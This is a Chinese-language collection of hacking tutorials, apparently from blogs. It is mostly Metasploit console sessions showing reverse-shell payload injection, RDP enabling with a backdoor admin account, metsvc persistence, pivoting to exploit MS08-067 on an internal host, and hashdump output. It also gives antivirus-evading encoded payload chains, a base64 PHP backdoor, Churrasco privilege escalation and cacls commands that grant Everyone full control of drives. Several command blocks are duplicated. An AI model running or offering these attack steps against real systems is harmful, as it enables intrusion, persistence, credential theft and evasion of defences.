msf  post(payload_inject) >
msf  exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf  post(payload_inject) >
msf  post(payload_inject) > show options 

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION                                   yes       The session to run this module on.

msf  post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  post(payload_inject) > set LPORT 9999
LPORT => 9999
msf  post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf  post(payload_inject) > set SESSION 5
SESSION => 5
msf  post(payload_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed
msf  post(payload_inject) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(payload_inject) >

TCP Shell Session

根据目标安装的脚本设置后门。。有auto, ruby, python, perl, bash,LINUX下也行
因为我啥子都木装 所以。。。 你动的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
msf  post(system_session) > show options 

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

msf  post(system_session) > set HANDLER true
HANDLER => true
msf  post(system_session) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(system_session) > set SESSION 5
SESSION => 5
msf  post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf  post(system_session) > set TYPE bash
TYPE => bash
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) > set TYPE python
TYPE => python
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf  post(system_session) > set LPORT 5555
LPORT => 5555
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) >
msf  post(system_session) > show options 

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

msf  post(system_session) > set HANDLER true
HANDLER => true
msf  post(system_session) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(system_session) > set SESSION 5
SESSION => 5
msf  post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf  post(system_session) > set TYPE bash
TYPE => bash
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) > set TYPE python
TYPE => python
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf  post(system_session) > set LPORT 5555
LPORT => 5555
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) >

pxexploit

看说明:
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into
memory that reads the hard drive; placing a payload to install
metsvc, disable the firewall, and add a new user metasploit on any
Windows partition seen, and add a uid 0 user with username and
password metasploit to any linux partition seen. The windows user
will have the password p@SSw0rd!123456 (in case of complexity
requirements) and will be added to the administrators group. See
exploit/windows/misc/pxesploit for a version to deliver a specific
payload. Note: the displayed IP address of a target is the address
this DHCP server handed out, not the “normal” IP address the host
uses.
没条件 所以不演示了

自动3389

很简单,进入模块设置帐号密码。 端口。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf  post(enable_rdp) > show options 

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORDWARD  false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to fordward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf  post(enable_rdp) > set USERNAME test
USERNAME => test
msf  post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf  post(enable_rdp) > set SESSION 5
SESSION => 5
msf  post(enable_rdp) > exploit 

[*] Enabling Remote Desktop
[*]  RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]  The Terminal Services service is not set to auto, changing it to auto ...
[*]  Opening port in local firewall if necessary
[*] Setting user account for logon
[*]  Adding User: test with Password: test
[*]  Adding User: test to local group 'Remote Desktop Users'
[*]  Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf  post(enable_rdp) >
msf  post(enable_rdp) > show options 

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORDWARD  false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to fordward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf  post(enable_rdp) > set USERNAME test
USERNAME => test
msf  post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf  post(enable_rdp) > set SESSION 5
SESSION => 5
msf  post(enable_rdp) > exploit 

[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] Setting user account for logon
[*] 	Adding User: test with Password: test
[*] 	Adding User: test to local group 'Remote Desktop Users'
[*] 	Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf  post(enable_rdp) >

看看3389开了木???

1
2
3
4
msf  post(enable_rdp) > nc -v 5.5.5.3 3389
[*] exec: nc -v 5.5.5.3 3389

Connection to 5.5.5.3 3389 port [tcp/*] succeeded!
msf  post(enable_rdp) > nc -v 5.5.5.3 3389
[*] exec: nc -v 5.5.5.3 3389

Connection to 5.5.5.3 3389 port [tcp/*] succeeded!

开了,你当然也能换其他端口

Inject in Memory

这货很牛B,内存射入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf  post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf  post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf  post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf  post(multi_meterpreter_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf  post(multi_meterpreter_inject) >
msf  post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf  post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf  post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf  post(multi_meterpreter_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf  post(multi_meterpreter_inject) >

成功获得了SHELL,

metsvc door

作为系统服务启动的
首先获得工具:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”

100%[======================================>] 55,871      46.2K/s   花时 1.2s  

2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive:  metsvc-1.0.zip
   creating: metsvc-1.0/
  inflating: metsvc-1.0/ChangeLog.txt
  inflating: metsvc-1.0/metsvc-server.exe
  inflating: metsvc-1.0/metsvc.exe
  inflating: metsvc-1.0/README.txt
   creating: metsvc-1.0/src/
  inflating: metsvc-1.0/src/Makefile
  inflating: metsvc-1.0/src/metsvc-server.cpp
  inflating: metsvc-1.0/src/metsvc.cpp
  inflating: metsvc-1.0/src/metsvc.h
  inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
meterpreter.jar    metsrv.dll         metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt  metsvc.exe         README.txt  test.rb
metsrv.dll     metsvc-server.exe  src
brk@Dis9Team:/tmp/metsvc-1.0$
brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”

100%[======================================>] 55,871      46.2K/s   花时 1.2s  

2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive:  metsvc-1.0.zip
   creating: metsvc-1.0/
  inflating: metsvc-1.0/ChangeLog.txt
  inflating: metsvc-1.0/metsvc-server.exe
  inflating: metsvc-1.0/metsvc.exe
  inflating: metsvc-1.0/README.txt
   creating: metsvc-1.0/src/
  inflating: metsvc-1.0/src/Makefile
  inflating: metsvc-1.0/src/metsvc-server.cpp
  inflating: metsvc-1.0/src/metsvc.cpp
  inflating: metsvc-1.0/src/metsvc.h
  inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
meterpreter.jar    metsrv.dll         metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt  metsvc.exe         README.txt  test.rb
metsrv.dll     metsvc-server.exe  src
brk@Dis9Team:/tmp/metsvc-1.0$

然后上传:

1
2
3
4
5
6
7
8
9
10
meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
meterpreter >
meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
meterpreter >

安装服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > shell
Process 2632 created.
Channel 6 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.

c:\windows>metsvc.exe install-service
metsvc.exe install-service
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

c:\windows>
meterpreter > shell
Process 2632 created.
Channel 6 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.

c:\windows>metsvc.exe install-service
metsvc.exe install-service
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

c:\windows>

然后你懂的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(handler) > exploit 

[-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800

meterpreter >
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(handler) > exploit 

[-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800

meterpreter >

结束语

还有很多东西想介绍 但是没时间搭建环境 所以写道这里

metasploit的pivot实例详解

first,不管怎么样,各种方式,首先获得一个shell,system权限的shell,建立meterpter的session
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeManageVolumePrivilege

meterpreter > getsystem
…got system (via technique 1).

然后看下本地的ip神马的

meterpreter > ipconfig /all

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 65539
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:cd:69:e8
MTU          : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0

然后获取本地网络分配情况

meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0

ok,咱们开始添加本地网关和ip地址,在session里面创建虚拟路由功能

meterpreter > run autoroute -h
Get a list of local subnets based on the host’s routes
USAGE: run get_local_subnets

OPTIONS:

-D        Delete all routes (does not require a subnet)
-d        Delete the named route instead of adding it
-h        Help and usage
-n <opt>  Netmask (IPv4, for example, 255.255.255.0
-p        Print active routing table. All other options are ignored
-s <opt>  Subnet (IPv4, for example, 10.10.10.0)

不多解释,大家都能看懂,我们开始添加IP地址和子网掩码

meterpreter > run autoroute -s 192.168.0.0/24
[*] Adding a route to 192.168.0.0/255.255.255.0…
[+] Added route to 192.168.0.0/255.255.255.0 via xxx.24y.x7.50
[*] Use the -p option to list all active routes

自动分配IP,然后查看一下分配的IP情况

meterpreter > run autoroute -p

Active Routing Table
====================

Subnet             Netmask            Gateway
——             ——-            ——-
192.168.0.0        255.255.255.0      Session 1

创建 成功,当前session成功创建虚拟路由客户端,后台运行当前session

meterpreter >
Background session 1? [y/N]

扫描当前目标网络的机器smb信息,借此来判断开放smb信息机器的一些信息

msf  auxiliary(smb_version) > run

[*] Scanned 029 of 256 hosts (011% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] 192.168.0.101:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:AV-PC) (domain:AV-PC)
[*] 192.168.0.100:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:USERCHI-4JSMNL8) (domain:WORKGROUP)
[*] Scanned 103 of 256 hosts (040% complete)
[*] 192.168.0.116:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.127:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.128:445 is running Windows 2000 Service Pack 4 with MS05-010+ (language: Chinese – Traditional) (name:J86PG7C8XQQPZDD) (domain:雨薇在线)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

人品爆发了,内网有一台Windows 2000server的机器,试试08067,估计杀他还是没问题的

msf  exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.0.0
LHOST => 192.168.0.0
msf  exploit(ms08_067_netapi) > set LPORT 9988
LPORT => 9988
msf  exploit(ms08_067_netapi) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on xx.xy.xxy.131:9988
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2000 – Service Pack 4 with MS05-010+ – lang:Chinese – Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to yyy.yxy.xyx.154
[*] Meterpreter session 2 opened (xx.xy.xxy.131:9988 -> yyy.yxy.xyx.154:33303) at Sat Mar 24 00:42:30 +0400 2012

meterpreter >

连踩两次狗屎,可以去买彩票了。溢出成功,现在看看ip神马的

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1500
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 16777219
============
Name         : AMD PCNET Family Ethernet Adapter
Hardware MAC : 00:0c:29:5f:c6:cd
MTU          : 1500
IPv4 Address : 192.168.0.128
IPv4 Netmask : 255.255.255.0

没错,的确是我们的目标机器的内网机器,跟上面的IP是有所不同的吧,

抓hash啊,亲,

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
IWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
TsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::

后台运行看一下

meterpreter >
Background session 2? [y/N]
msf  exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id  Type                   Information                            Connection
—  —-                   ———–                            ———-
1   meterpreter x86/win32  MILSEC\Administrator @ MILSEC          xx.xy.xxy.131:5546 -> xxx.24y.57.50:30310 (192.168.0.116)
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ J86PG7C8XQQPZDD  xx.xy.xxy.131:9988 -> xxx.24x.148.154:33303 (192.168.0.128)

msf  exploit(ms08_067_netapi) >
亲,两个不同的内网IP和不同的外网IP哦,证明是两台不同的机器通过同一个pivot环境来溢出的,

 

linux 下面的这个是需要root权限来执行的,不然autoroute是会出问题的,Linux的明天再扯,希望这个对大家做内网审计的时候能有一些帮助……

Metasploit 权限提升|metasploit -> meterpreter 一个命令完成提权,一个命令完成3389,犀利的提权工具

攻击

首先我虚拟机的APACHE是以非系统权限启动的

我们来生成一个Door

root@Dis9Team:~$ sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 x > /var/www/door.exe
[sudo] password for brk:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.1", "LPORT"=>"4444"}

然后上传到WEB SHELL 服务器 运行,metasploit本地监听

看终端 成功去定了SHELL

你可以用强大的meterpreter会话帮你权限提升,他会自动运行从古到今的本地EXP 360的也有哦:

meterpreter > getuid
Server username: DIS9TEAM-5FA711\apache   ==>不是系统权限
meterpreter > getsystem                   ==>运行一个命令
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM      ==>传说种的溢出
meterpreter >

如果安全了杀毒软件你也可以BYPASS

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=21 R | ./msfencode -e x86/call4_dword_xor -t raw -c 5 | ./msfencode -e x86/countdown -t raw -c 5 | ./msfencode -e x86/fnstenv_mov -t raw -c 5 | ./msfencode -e x86/jmp_call_additive -t raw -c 5 | ./msfencode -t exe -c 5 > /tmp/5x.exe

如果你嫌弃EXE露点你也可以生成脚本后门:

root@Dis9Team:/tmp/# msfpayload -l | grep php
    php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
    php/bind_perl_ipv6                               Listen for a connection and spawn a command shell via perl (persistent) over IPv6
    php/bind_php                                     Listen for a connection and spawn a command shell via php
    php/bind_php_ipv6                                Listen for a connection and spawn a command shell via php (IPv6)
    php/download_exec                                Download an EXE from an HTTP URL and execute it
    php/exec                                         Execute a single system command
    php/meterpreter/bind_tcp                         Listen for a connection, Run a meterpreter server in PHP
    php/meterpreter/reverse_tcp                      Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
    php/meterpreter_reverse_tcp                      Connect back to attacker and spawn a Meterpreter server (PHP)
    php/reverse_perl                                 Creates an interactive shell via perl
    php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
    php/shell_findsock                               

msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

metasploit -> meterpreter  一个命令完成提权,一个命令完成3389,犀利的提权工具

meterpreter高级功能简介

Meterpreter是Metasploit的默认Windows系统下的Shell Code
以前Meterpreter只是Metasploit入侵时短期凑活一下用的
一旦入侵成功后就尽快上传远控

但是现在新一代的Meterpreter变得异常强大
我甚至感觉许多情况下用Meterpreter进行操作就足够了

特色功能1:快速提权
Getsystem命令快速提权
实在没有比这个简单的了
一条指令你就拥有了System权限

Meterpreter会自己尝试用多种方法让你获得System权限

特色功能2:Hashdump
运行这个命令:run post/windows/gather/hashdump
一条命令你就能够获得Windows的Sam 数据库里的内容
就是经过加密的用户名和密码

特色功能3:直接打开3389
Getgui命令是Meterpreter新添加的命令
这个命令能够让你轻松的在目标系统上打开3389远程管理
这条命令有两个用法:run getgui -e(仅仅是打开远程管理)
run getgui -u hacker -p s3cr3t(打开远程管理并且创造一个新的用户名为Hacker密码为s3cr3t的帐号)

特色功能4:网络嗅探
Meterpreter拥有非常强大的网络嗅探能力
它能够不在目标系统上安装任何驱动的情况下进行网络嗅探
而且它还聪明到了自己的流量要被忽略掉

特色功能5:网络中继
往往入侵局域网黑客碰到的最大困难时无法穿过NAT
现在有了Meterpreter就轻松了
Meterpreter能够让一台你已经入侵的电脑变成中继,来入侵同一个局域网里的其他电脑

特色功能6:截屏
截屏看到对方电脑上正在做什么
这个功能很容易理解吧

最好的Metasploit教程:http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training

巴西烤肉提权

忘了这个犀利的东东了。。

提权必用!good

必须能够使用cmd命令,无路是系统自带的还是自己上传的。

上传巴西烤肉到网站某目录:wwwroot/admin/假设,假设他绝对路径是d:/wwwroot/admin/a.exe

那么执行cmd命令:

d:/wwwroot/admin/a.exe “net user”

其余的你懂的。

巴西烤肉软件:

Churrasco  带有c++源代码哦。有兴趣的自己编译

Cacls提权命令

刚刚搞了个sa,

恢复xp_cmdshell,写小马之后,连接,可是权限太小。各种不能读写。

好久终于想起来这么个东东。好久不搞安全,真是生疏了~~

aspContentLabel style=”PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px”>Cacls的命令参数:
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
